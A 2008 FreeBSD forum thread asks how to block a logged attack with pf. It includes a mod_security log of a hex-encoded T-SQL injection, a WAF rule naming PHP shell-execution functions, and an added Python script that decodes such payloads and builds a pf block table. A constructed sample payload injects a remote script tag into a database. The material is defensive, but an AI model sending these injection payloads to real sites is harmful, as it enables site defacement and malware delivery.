DaemonForums, FreeBSD Security
Generic PHP Exploit
18th August 2008, hunteronline (Fdisk Soldier; Join Date: Jul 2008; Posts: 52)

Dropping net garbage with pf.conf. I can't find a way of blocking/dropping "PHP Exploit" attempts with a basic pf.conf rule. Can anyone point me in the right direction on this?

Thanks

The following is from a mod_security log file:

Request: www.mysite.com 68.97.80.139 - - [18/Aug/2008:14:22:56 +0000] "GET /node/8230?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x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xEC(@S); HTTP/1.1" 403 303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" - "-"
----------------------------------------
GET /node/8230?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x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xEC(@S); HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Keep-Alive
Host: www.mysite.com
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "(chr|fwrite|fopen|system|e?chr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\\(.*\\)\\;" at THE_REQUEST [id "330001"][rev "1"] [msg "Generic PHP exploit pattern denied"] [severity "CRITICAL"]

HTTP/1.1 403 Forbidden
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--da174d4f--
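A note on what the log above actually shows, and an added example that is not code from the post or from DaemonForums. The request `DECLARE @S CHAR(4000); SET @S=CAST(0x... AS CHAR(4000)); EXEC(@S);` is Transact-SQL: a hex-encoded statement handed to SQL Server's EXEC(). Rule 330001 fired only because its `exec\(.*\)\;` alternative happens to match `EXEC(@S);`, so the "PHP exploit" label is an accident of the regex. That also answers the pf question: pf filters on addresses, ports and connection state and never looks at the query string, so the string itself can only be blocked where it already was, in mod_security (the 403 in the log). What pf can do is carry a table of source hosts mod_security has already caught. The script below parses `Request:` lines of the shape shown above, decodes the hex blob so the operator can read the SQL that would have run (it goes beyond the post's CHAR() case and also handles the NVARCHAR() variant, whose blob is UTF-16LE), and emits the one-address-per-line file that a pf `table ... file` loads. The sample log lines, addresses (RFC 5737 documentation ranges), hostnames and payload are all constructed.

```python
"""Turn mod_security "Request:" log lines into a pf table of attacking
hosts, decoding the hex blob of T-SQL CAST()/EXEC() injections so the
operator can read the SQL that would have run.

Added example, not code from the forum post. Sample log lines,
addresses (RFC 5737 ranges) and the payload are constructed.
"""
import ipaddress
import re
from urllib.parse import unquote

# The SQL hidden in the first sample line. Hex-encoding it here, rather
# than hand-typing a hex string, keeps the sample correct by construction.
SAMPLE_SQL = "UPDATE news SET body=body+'<script src=http://example.net/x.js></script>'"
SAMPLE_HEX = SAMPLE_SQL.encode("latin-1").hex().upper()

# Constructed lines in the shape of the post's "Request:" line.
# 1: CHAR() injection like the post; 2: benign; 3: NVARCHAR() variant,
# whose hex payload is UTF-16LE rather than single-byte text.
SAMPLE_LOG = (
    'Request: www.example.com 192.0.2.10 - - [18/Aug/2008:14:22:56 +0000] '
    '"GET /node/8230?\';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x' + SAMPLE_HEX
    + '%20AS%20CHAR(4000));EXeC(@S); HTTP/1.1" 403 303 "-" "Mozilla/4.0" - "-"\n'
    'Request: www.example.com 198.51.100.7 - - [18/Aug/2008:14:23:01 +0000] '
    '"GET /node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" - "-"\n'
    'Request: www.example.com 203.0.113.9 - - [18/Aug/2008:14:25:11 +0000] '
    '"GET /index.php?id=1;DECLARE%20@T%20NVARCHAR(4000);SET%20@T=CAST(0x'
    + "SELECT 1".encode("utf-16-le").hex().upper()
    + '%20AS%20NVARCHAR(4000));EXEC(@T); HTTP/1.1" 403 303 "-" "curl/7.19" - "-"\n'
)

REQUEST_RE = re.compile(
    r'^Request: (?P<host>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Rule 330001 from the post, joined back together. With case folding the
# "exec" alternative matches "EXeC(@S);", which is all the "PHP" in it.
MODSEC_330001 = re.compile(
    r"(chr|fwrite|fopen|system|e?chr|passthru|popen|proc_open|shell_exec|exec"
    r"|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak"
    r"|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid"
    r"|posix_setuid|phpinfo)\(.*\);",
    re.I,
)

# T-SQL shape: DECLARE @v [N][VAR]CHAR(n); SET @v=CAST(0xHEX AS ...); EXEC(@v)
TSQL_RE = re.compile(
    r"DECLARE\s+@\w+\s+(?P<n>N?)(?:VAR)?CHAR\(\d+\)"
    r".*?CAST\(0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\)"
    r".*?EXEC\s*\(\s*@\w+\s*\)",
    re.I,
)


def parse_request_line(line):
    """Split one mod_security 'Request:' line; None if it is not one."""
    m = REQUEST_RE.match(line)
    if m is None:
        return None
    req = m.groupdict()
    req["decoded_target"] = unquote(req["target"])  # %20 -> space, etc.
    return req


def decode_payload(m):
    """Recover the SQL from the CAST(0x...) blob. SQL Server stores
    N[VAR]CHAR as UTF-16LE and plain [VAR]CHAR as single-byte text."""
    raw = bytes.fromhex(m.group("hex"))
    encoding = "utf-16-le" if m.group("n") else "latin-1"
    return raw.decode(encoding, errors="replace")


def analyse(log_text):
    """Map each offending source IP to the list of SQL it tried to run."""
    hits = {}
    for line in log_text.splitlines():
        req = parse_request_line(line)
        if req is None:
            continue
        m = TSQL_RE.search(req["decoded_target"])
        if m is None and MODSEC_330001.search(req["target"]) is None:
            continue  # neither the SQL shape nor the WAF rule fires
        payload = decode_payload(m) if m else "<matched rule 330001, no CAST() blob>"
        hits.setdefault(req["ip"], []).append(payload)
    return hits


def _ip_key(ip):
    addr = ipaddress.ip_address(ip)
    return (addr.version, addr)  # IPv4 before IPv6, then numeric order


def pf_table_lines(hits):
    """Addresses in the one-per-line form that pf's 'table ... file' loads,
    sorted so the file diffs cleanly between runs."""
    return sorted(hits, key=_ip_key)


def write_pf_table(hits, path):
    """Write the table file; reload with: pfctl -t webattackers -T replace -f path"""
    with open(path, "w") as fh:
        fh.write("".join(ip + "\n" for ip in pf_table_lines(hits)))
    return path


if __name__ == "__main__":
    found = analyse(SAMPLE_LOG)
    for ip, payloads in found.items():
        for sql in payloads:
            print(f"{ip}\t{sql}")
    print("pf table:", " ".join(pf_table_lines(found)))
```

To use the file pf-side, declare the table in pf.conf as `table <webattackers> persist file "/etc/pf/webattackers"`, block with `block in quick on $ext_if proto tcp from <webattackers> to any port { 80, 443 }`, and after each run of the script refresh the kernel copy with `pfctl -t webattackers -T replace -f /etc/pf/webattackers` (table and path names are the example's choice). Treat the table as a convenience rather than the defence: the 403 in the log shows mod_security already dropped the request before any application code saw it, the sending addresses change over time so entries should be expired rather than accumulated forever, and a T-SQL blob does nothing against a PHP application on FreeBSD unless that application forwards its query string to a SQL Server.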